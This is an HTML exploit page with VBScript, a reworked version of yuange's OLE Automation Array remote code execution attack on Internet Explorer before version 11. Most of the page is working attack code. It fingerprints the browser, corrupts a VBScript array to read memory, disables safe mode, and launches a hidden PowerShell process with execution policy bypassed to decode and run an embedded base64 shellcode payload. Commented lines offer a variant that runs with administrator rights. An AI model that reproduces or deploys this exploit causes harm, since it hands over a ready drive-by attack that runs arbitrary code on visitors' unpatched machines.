230 lines
No EOL
6.1 KiB
HTML
230 lines
No EOL
6.1 KiB
HTML
<!doctype html>
|
|
<html>
|
|
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
|
|
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|
|
<body>
|
|
|
|
<pre>
|
|
|--------------------------------------------------------------------------|
|
|
| Title: OLE Automation Array Remote Code Execution => Pre IE11 |
|
|
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |
|
|
| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) |
|
|
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |
|
|
| Usage: http://www.fuzzysecurity.com/exploits/21.html |
|
|
|--------------------------------------------------------------------------|
|
|
Very nice black-magic yuange, don't think it went unnoticed that you
|
|
have been popping shells since 2009 :D 人无千日好,花无百日红
|
|
|--------------------------------------------------------------------------|
|
|
</pre>
|
|
|
|
<SCRIPT LANGUAGE="VBScript">
|
|
function runmumaa()
|
|
On Error Resume Next
|
|
set shell=createobject("Shell.Application")
|
|
|
|
'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!'
|
|
payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw=="
|
|
|
|
command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
|
|
|
|
params="-NoP -NonI -Exec Bypass -Command " & command
|
|
|
|
'Original POC yuange
|
|
'set shell=createobject("Shell.Application")
|
|
'shell.ShellExecute "notepad.exe"
|
|
|
|
'With UAC
|
|
'shell.ShellExecute "powershell", params, "", "runas", 0
|
|
|
|
'Without UAC
|
|
shell.ShellExecute "powershell", params, "", "", 0
|
|
|
|
end function
|
|
</script>
|
|
|
|
<SCRIPT LANGUAGE="VBScript">
|
|
|
|
dim aa()
|
|
dim ab()
|
|
dim a0
|
|
dim a1
|
|
dim a2
|
|
dim a3
|
|
dim win9x
|
|
dim intVersion
|
|
dim rnda
|
|
dim funclass
|
|
dim myarray
|
|
|
|
Begin()
|
|
|
|
function Begin()
|
|
On Error Resume Next
|
|
info=Navigator.UserAgent
|
|
|
|
if(instr(info,"Win64")>0) then
|
|
exit function
|
|
end if
|
|
|
|
if (instr(info,"MSIE")>0) then
|
|
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
|
|
else
|
|
exit function
|
|
|
|
end if
|
|
|
|
win9x=0
|
|
|
|
BeginInit()
|
|
If Create()=True Then
|
|
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
|
|
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
|
|
|
|
if(intVersion<4) then
|
|
document.write("<br> IE")
|
|
document.write(intVersion)
|
|
runshellcode()
|
|
else
|
|
setnotsafemode()
|
|
end if
|
|
end if
|
|
end function
|
|
|
|
function BeginInit()
|
|
Randomize()
|
|
redim aa(5)
|
|
redim ab(5)
|
|
a0=13+17*rnd(6)
|
|
a3=7+3*rnd(5)
|
|
end function
|
|
|
|
function Create()
|
|
On Error Resume Next
|
|
dim i
|
|
Create=False
|
|
For i = 0 To 400
|
|
If Over()=True Then
|
|
' document.write(i)
|
|
Create=True
|
|
Exit For
|
|
End If
|
|
Next
|
|
end function
|
|
|
|
sub testaa()
|
|
end sub
|
|
|
|
function mydata()
|
|
On Error Resume Next
|
|
i=testaa
|
|
i=null
|
|
redim Preserve aa(a2)
|
|
|
|
ab(0)=0
|
|
aa(a1)=i
|
|
ab(0)=6.36598737437801E-314
|
|
|
|
aa(a1+2)=myarray
|
|
ab(2)=1.74088534731324E-310
|
|
mydata=aa(a1)
|
|
redim Preserve aa(a0)
|
|
end function
|
|
|
|
|
|
function setnotsafemode()
|
|
On Error Resume Next
|
|
i=mydata()
|
|
i=readmemo(i+8)
|
|
i=readmemo(i+16)
|
|
j=readmemo(i+&h134)
|
|
for k=0 to &h60 step 4
|
|
j=readmemo(i+&h120+k)
|
|
if(j=14) then
|
|
j=0
|
|
redim Preserve aa(a2)
|
|
aa(a1+2)(i+&h11c+k)=ab(4)
|
|
redim Preserve aa(a0)
|
|
|
|
j=0
|
|
j=readmemo(i+&h120+k)
|
|
|
|
Exit for
|
|
end if
|
|
|
|
next
|
|
ab(2)=1.69759663316747E-313
|
|
runmumaa()
|
|
end function
|
|
|
|
function Over()
|
|
On Error Resume Next
|
|
dim type1,type2,type3
|
|
Over=False
|
|
a0=a0+a3
|
|
a1=a0+2
|
|
a2=a0+&h8000000
|
|
|
|
redim Preserve aa(a0)
|
|
redim ab(a0)
|
|
|
|
redim Preserve aa(a2)
|
|
|
|
type1=1
|
|
ab(0)=1.123456789012345678901234567890
|
|
aa(a0)=10
|
|
|
|
If(IsObject(aa(a1-1)) = False) Then
|
|
if(intVersion<4) then
|
|
mem=cint(a0+1)*16
|
|
j=vartype(aa(a1-1))
|
|
if((j=mem+4) or (j*8=mem+8)) then
|
|
if(vartype(aa(a1-1))<>0) Then
|
|
If(IsObject(aa(a1)) = False ) Then
|
|
type1=VarType(aa(a1))
|
|
end if
|
|
end if
|
|
else
|
|
redim Preserve aa(a0)
|
|
exit function
|
|
|
|
end if
|
|
else
|
|
if(vartype(aa(a1-1))<>0) Then
|
|
If(IsObject(aa(a1)) = False ) Then
|
|
type1=VarType(aa(a1))
|
|
end if
|
|
end if
|
|
end if
|
|
end if
|
|
|
|
|
|
If(type1=&h2f66) Then
|
|
Over=True
|
|
End If
|
|
If(type1=&hB9AD) Then
|
|
Over=True
|
|
win9x=1
|
|
End If
|
|
|
|
redim Preserve aa(a0)
|
|
|
|
end function
|
|
|
|
function ReadMemo(add)
|
|
On Error Resume Next
|
|
redim Preserve aa(a2)
|
|
|
|
ab(0)=0
|
|
aa(a1)=add+4
|
|
ab(0)=1.69759663316747E-313
|
|
ReadMemo=lenb(aa(a1))
|
|
|
|
ab(0)=0
|
|
|
|
redim Preserve aa(a0)
|
|
end function
|
|
|
|
</script>
|
|
|
|
</body>
|
|
</html> |